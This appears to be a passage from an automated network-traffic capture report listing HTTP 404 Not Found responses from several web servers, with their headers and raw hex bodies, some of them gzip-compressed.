Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:25 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:27 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:30 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 31 Aug 2024 12:06:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:16:59 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4765Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 0e 49 90 d4 77 89 52 ca 50 94 c4 8b 24 32 24 e5 ef 2e 1f 08 2e 49 58 20 00 03 4b 49 b4 e3 f7 92 f6 2e f1 b5 76 1c 5f d2 9c dd 26 cd 39 79 2f f6 4b 7a f6 f5 ae 4d 7c 49 9c fe 33 a2 24 ff d4 7f a1 b3 00 41 82 c0 82 a2 e9 84 ba 2b f4 24 11 8b d9 d9 cf cc ce cc ce 2c 01 c4 ff 76 29 93 2c 9c cb a6 50 8d d4 a5 c5 13 71 eb 1f e6 cb 8b 27 10 1c f1 3a 26 3c 12 6a bc a6 63 b2 e0 db 2c 2c 87 66 7c ed 4b 44 24 12 5e 3c f8 d3 f7 07 df 7f d6 ba 7d e7 e0 a3 cf 9e 7d 74 ef f0 f1 e3 38 67 5e b1 31 90 f9 3a 5e f0 69 4a 49 21 ba 0f 09 8a 4c b0 0c ec 64 45 94 cb 78 37 28 2b 15 45 92 94 1d 1f e2 da bd 74 d2 b4 38 d0 83 3b 85 5e e7 75 8c 4e 71 9d a6 92 52 6e a2 6b 9d 53 7a 08 8a a4 68 73 e8 a5 f1 f1 f1 f9 9e 0b 15 18 70 0e 45 a7 d4 5d 74 1a 6b 65 5e e6 83 c8 b7 8a a5 6d 4c 44 81 47 1b b8 81 7d 41 54 b3 1a 82 28 a1 89 bc 14 44 fe 75 51 d0 14 5d a9 10 74 8e 5f c5 a2 3f 88 74 5e d6 43 3a d6 c4 4a ef 10 75 5e ab 8a f2 1c 8a f4 36 ab 7c b9 2c ca 55 68 47 b1 08 0c 4f ff 74 29 ae 77 3e d5 a2 d7 98 ec a2 b4 53 c4 c9 95 ca 13 d2 c5 ab 78 0e c5 66 ec 0c 3b 17 77 b0 58 ad 81 cc 93 11 47 57 49 94 71 a8 d6 be 3a 1e f3 40 13 63 2b 76 22 36 33 23 e0 3e c3 4d 38 87 eb c8 4f 75 1f 61 ab 6c ea 08 11 a3 2e 11 4b 8a 56 c6 5a 08 ac 89 28 75 20 00 06 ba 22 89 65 f4 12 c6 98 29 d0 b8 87 7a 63 4c ed b5 c7 9d ea ab da 92 22 95 59 63 f1 a5 92 e6 50 5f 43 d3 a9 fe c0 c0 d4 5e 86 04 ef 92 50 19 0b 8a c6 13 51 01 40 0d f0 07 8d ce 51 5f ba 90 e1 1e 73 a8 0c 0a c0 6c 10 ec 09 9c 99 a2 3f f3 4c 74 2a 38 23 c1 1a 93 db 5c 4d d9 c6 0e a9 06 c1 de 65 11 36 0c 0f 6b 9a e2 60 53 e2 85 ad aa a6 40 67 c0 57 99 11 4a 42 c9 de bf cb 00 0b 35 05 11 be 24 61 87 db ef 88 65 52 a3 ae 12 79 b9 4f 4f 55 73 f6 eb d8 a6 7b a2 a9 b4 15 08 48 73 88 6f 10 c5 d3 42 66 26 5f ee e3 5d d1 f0 c4 e4 bc 87 ac 21 6b 46 2a d3 f4 87 65 de ae 58 d2 b6 7a 8d 2f 8b 0d 1d 9c 97 69 9d 15 be 2e 4a cd 39 94 54 64 70 09 5e 87 40 b7 26 96 b0 39 47 68 5d 91 15 88 74 eb 58 96 94 20 d0 34 34 11 6b 41 54 87 66 5d e5 05 7c 84 fe 16 fb 69 d1 c3 bb 23 4e 6b b0 07 f5 d4 ae 80 55 03 59 5a ae 28 f6 f0 1e c6 9d 4b 2c d7 0d 11 45 9d f3 8c a6 b6 ce e1 3a d6 75 be 8a bd a6 de 15 00 2c e5 db 82 4a b9 5c 66 ce 84 15 7f 22 48 56 9c 1e db 6b 09 ec 20 6d 18 91 db f8 da dc 41 c2 90 84 2b a4 33 e1 13 7d 08 35 3a 90 37 25 db 34 dc 96 61 59 84 b5 4a fa 5a 3f 3e 3a 7c fa f8 d9 bf fd ea d9 f7 77 7c 1e d6 d1 d5 b5 a0 94 1d 8a 06 27 e2 41 01 54 0e 46 44 e3 25 b1 0a 26 22 e0 de c0 43 8f 8e 7f 54 98 0b ad 29 30 6b fe fa 78 b5 c3 81 dc fa b4 87 a2 d9 d9 d9 a3 4c 4b 07 6d 09 38 e4 96 da be ea 0d 66 5d 7d 42 e2 2c fd 61 87 a7 d0 ae 15 a0 06 47 4a 5d 98 bd 18 ba 3c f5 08 2e 48 91 8e 64 44 8f 7e d9 43 59 d4 55 89 07 a3 14 65 c3 63 4a 92 22 6c 39 26 1c 66 9b 19 e2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4786Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 54 96 ff 79 f9 2b de 9a 82 1d b0 2d db 49 9c 6f 4e 58 d7 71 12 43 62 1b db 29 2d b4 eb 23 4b cf b6 1a 59 52 a5 e7 7c 69 e9 39 b0 3b 03 cc 6e 4b 61 60 99 76 17 96 29 9c 43 39 b0 d3 ce ce 17 60 80 b2 ff 4c 9d a6 3f ed bf b0 f7 49 96 2d 4b 4f 8e 71 c1 99 59 e5 24 b1 9e ee bb ef 73 ef bb f7 be 7b 9f 25 a5 fe 7e b5 90 a9 9c 2b 66 51 93 b4 e4 95 27 52 f6 3f cc 8b 2b 4f 20 38 52 2d 4c 78 24 34 79 dd c0 64 39 b0 5d 59 8b cc 07 ba 97 88 44 64 bc f2 f0 8f df 3d fc ee e3 ce 8d 77 1f be ff f1 a3 f7 6f 1d dd bb 97 e2 ac 2b 0e 06 0a df c2 cb 01 5d ad a9 c4 08 20 41 55 08 56 80 9d a2 4a 8a 88 f7 c3 8a 5a 57 65 59 dd 0b 20 ae db cb 20 07 36 07 7a 70 cf a0 d3 bc 81 d1 33 5c af a9 a6 8a 07 e8 4a ef 94 1e 82 2a ab fa 22 7a 72 7a 7a 7a 69 e0 42 1d 06 5c 44 f1 a4 b6 8f ce 60 5d e4 15 3e 8c 02 1b 58 de c5 44 12 78 94 c7 6d 1c 08 a3 a6 dd 10 46 69 5d e2 e5 30 0a 6e 49 82 ae 1a 6a 9d a0 73 fc 06 96 82 61 64 f0 8a 11 31 b0 2e d5 07 87 68 f1 7a 43 52 16 51 6c b0 59 e3 45 51 52 1a d0 8e 12 31 18 9e fe e9 53 5c ed 7d 6a c6 af 30 d9 c5 69 a7 98 9b 2b 95 27 62 48 97 f1 22 4a cc 3b 19 f6 2e ee 61 a9 d1 04 99 67 63 ae ae b2 a4 e0 48 b3 7b 75 3a e1 83 26 c1 56 ec 4c 62 7e 5e c0 43 86 9b 71 0f d7 93 9f ea 3e c6 56 59 f2 18 11 e3 1e 11 6b aa 2e 62 3d 02 d6 44 d4 16 10 00 03 43 95 25 11 3d 89 31 66 0a 34 ed a3 de 04 53 7b dd 71 93 43 55 5b 53 65 91 35 16 5f ab e9 2e f5 b5 75 83 ea 0f 0c 4c 1b 64 48 f0 3e 89 88 58 50 75 9e 48 2a 00 6a 83 3f e8 74 8e 86 d2 45 4c f7 58 44 22 28 00 b3 41 b0 27 70 3e 49 7f 96 98 e8 34 70 46 82 75 26 b7 c5 a6 ba 8b 5d 52 8d 82 bd cf 22 6a 1a 1e d6 75 d5 c5 a6 c6 0b 3b 0d 5d 85 ce 80 af 3e 2f d4 84 9a b3 7f 9f 01 16 9a 2a 22 7c 4d c6 2e b7 df 93 44 d2 a4 ae 12 7b 6a 48 4f 4d 77 f7 eb d9 a6 77 a2 a9 b4 75 08 48 8b 88 6f 13 d5 d7 42 e6 67 9f 1a e2 5d f1 e8 cc ec 92 8f ac 11 7b 46 ea 73 f4 87 65 de 9e 58 d2 b5 7a 9d 17 a5 b6 01 ce cb b4 ce 3a df 92 e4 83 45 94 51 15 70 09 de 80 40 b7 29 d5 b0 35 47 68 4b 55 54 88 74 5b 58 91 d5 30 d0 b4 75 09 eb 61 d4 82 66 43 e3 05 7c 8c fe 56 86 69 d1 c7 bb 63 6e 6b 70 06 f5 ec be 80 35 13 59 4e a9 ab ce f0 1e c5 bd 4b 2c d7 8d 10 55 5b f4 8d a6 8e ce d1 16 36 0c be 81 fd a6 de 13 00 6c e5 3b 82 8a 28 8a cc 99 b0 e3 4f 0c 29 aa db 63 07 2d 81 1d a4 4d 23 f2 1a 5f 97 3b 48 18 91 71 9d f4 26 7c 66 08 a1 4e 07 f2 a7 64 9b 86 d7 32 6c 8b b0 57 c9 40 e7 87 bb 47 f7 ef 3d fa 8f 5f 3e fa ee dd 80 8f 75 f4 75 2d a8 a2 4b d1 e0 44 3c 28 80 ca c1 88 68 bc 2c 35 c0 44 04 3c 18 78 e8 d1 f3 8f 3a 73 a1 b5 04 66 cd df 10 af 76 39 90 57 9f ce 50 b4 b0 b0 70 9c 69 19 a0 2d 01 47 bc 52 3b 57 bd d1 ac 6b 48 48 5c a0 3f ec f0 14 d9 b7 03 d4 e8 48 a9 0b b3 17 43 8f a7 1e c3 05 a9 f2 b1 8c e8 31 2c 7b 10 25 43 93 79 30 4a 49 31 3d a6 26 ab c2 8e 6b c2 61 b6 99 21 de
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:04 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 12974Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd bd 79 97 e3 d8 75 27 f8 f7 e8 53 60 d2 b2 33 4b ce 4c 2c 04 41 b0 2a ab 3c d8 17 82 00 89 85 04 69 69 f2 60 07 88 95 d8 49 59 e7 d8 33 dd b6 7a 46 b2 ac b6 c7 2d cd d8 e3 96 7d 8e a5 63 4f 4b 3d bd d8 6a db f2 7c 99 ca aa d2 5f f3 15 06 8c c8 c8 8c 8c 60 64 a5 52 76 56 f7 20 4f 46 10 0f ef dd f7 bb f7 dd f5 05 08 3c f9 ef 69 85 d2 37 0b 06 08 eb 34 f9 e8 4b 4f ae 7e 79 96 fb d1 97 80 e1 78 92 7a b5 05 38 a1 55 56 5e fd e1 3d 43 67 1f e1 f7 9e 5f aa a3 3a f1 3e fa f4 3f fe fd a7 7f ff 67 cf be f3 dd 4f ff e8 cf 7e fe 47 df ff ec 27 3f 79 02 5e 5e b9 46 20 b3 52 ef c3 7b 65 6e e7 75 75 0f 70 f2 ac f6 b2 81 5c 96 47 99 eb f5 0f b3 dc cf 93 24 ef ee 01 e0 f3 51 55 7d b8 a2 70 3a c0 af 00 a4 55 79 c0 57 c0 17 4d 76 ee 1e 80 af bf 38 3d 1d 4e 9e e4 e5 fb c0 af 8c 46 a3 0f 5e b9 e0 0f 13 be 0f c0 58 d1 03 2b af 74 ad cc 7a 08 dc e3 bd a4 f5 ea c8 b1 00 d9 6b bc 7b 0f 81 f0 aa e1 21 40 94 91 95 3c 04 ee cf 23 a7 cc ab dc af 81 8d c5 7b d1 fd 87 40 65 65 d5 a3 ca 2b 23 ff d5 29 52 ab 0c a2 ec 7d 00 7a b5 b9 b0 5c 37 ca 82 a1 1d 40 a0 61 fa d3 8f 97 3d be f1 e2 53 08 7f fd 2c 39 f8 34 08 ba 49 f5 c4 cf a3 2a 3a 7a ef 03 08 7e 9d e0 8b 8b 9d 17 05 e1 c0 f3 18 ba 31 34 89 32 ef 51 f8 fc ea 08 b9 03 0d 72 5e b0 28 82 e3 8e f7 9a e9 d0 9b d3 bd e0 ff 24 7b e8 bc c8 b0 cf 61 11 be c5 a2 9d 97 ae 57 3e 1a b4 a9 ce d3 a1 c3 40 a0 ca 93 c8 05 7e c5 f3 bc b3 0c 8d ee 10 2f 72 56 7a cf e7 c5 5e 2b 5a 3b 4f dc 73 73 59 b6 5d de 10 5f 53 56 27 f9 0d 0a 56 bc 4a b0 f6 fa fa 91 eb 39 79 69 d5 51 3e 00 6a 06 7b 28 4f 6b f4 da 7e 8f 2e cc e3 7d c0 1d 04 e0 9d 07 71 7e 01 71 ec f4 ef 83 b3 e8 8a c1 18 6b af 3c 4b ed fd 30 6f bd 1b 5c bd 09 f6 97 24 1e 5f 28 9e 57 96 f9 0d 32 b6 e5 c4 41 99 0f 83 07 7c 3e ee d8 8e 7d 7d fc 4b 02 9e 13 e6 40 6d d9 89 77 c3 ec bb c8 ad c3 93 a9 40 bf fa 9a 91 45 79 73 dc 0b dd bc bd d0 27 6e fd c1 21 bd 0f 58 4d 9d df a9 21 f8 f8 57 5f 63 5d f0 63 74 fc c1 1d bc 3e ba 5a 11 7f 72 fa 77 4e bd 6f f9 92 e7 5a 5f 5a 6e d4 54 83 f1 9e d5 4e df 4a a3 e4 f0 3e 40 e5 d9 60 12 56 35 38 3a 29 b2 bd cb 35 02 e6 79 96 0f 9e 6e ee 65 49 fe 70 e8 d3 94 91 57 3e 04 d2 a1 b9 2a 2c c7 fb 1c f9 7d f4 3a 29 de 61 dd d0 4d 6d b8 ee d4 99 de f1 8a 0b 64 42 e6 e7 d7 dd fb 63 ef c5 a5 73 a6 fb a8 ce 8b f7 ef f4 a6 d7 06 3f 4e bd aa b2 02 ef ae a5 bf e5 00 ae 84 7f cd a9 b8 ae 7b 76 25 ae fc 0f 04 64 f9 4d 8b 7d 55 13 ce 3b e9 0b 25 ba ad 7c cf a9 0f 1c 3e 4a 3c bf 7e b1 e0 e8 6b 3a 96 a7 89 ee ee 79 5e 35 6e 6b c6 95 46 5c 45 c9 7b cf fe f1 c7 9f fd ec 27 3f ff 3f fe e5 cf ff fe bb f7 ee d0 8e 97 b2 76 72 f7 86 a0 07 23 b2 06 01 9c f8 38 e3 d1 ac 24 0a 06 15 71 bc 57 1d cf e9 78 61 1f fe d9 40 7b c9 f0 b9 f5 7b 8d 55 df 30 a0 db f2 bc ee 8a a6 d3 e9 e7 a9 56 35 48 cb f1 1e dd e6 fa 7a d4 7b 33 ed 7a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:06 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:06:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9aP0izZuYVFphlYWy%2Bq3AMGB2yAsvEFmQG%2BmpDdfTM%2BEbPZhqii3WlRMAJrGnAvC6nukLMdBYk1wtCANeJCdXgv2giSesTUGodsOnx7L4e8rh0md%2FAF%2FjPTaYlAHSOmBDr2XGWI0w4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5c56f4c7d26-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbT6CQAPJlmA5JGRHgMvWp5EKS%2FIs6ab7fKz5XPUHL4pbXCR9VoliCvNbR4BdhoThL8TnVifD%2FRf9g946k%2FegTvlJdDfiQfXk4tvB8Npyor2ITUJvOBZ%2F%2Fe6oF1uFUzmfLdyFykMDj4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5d58e966a52-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 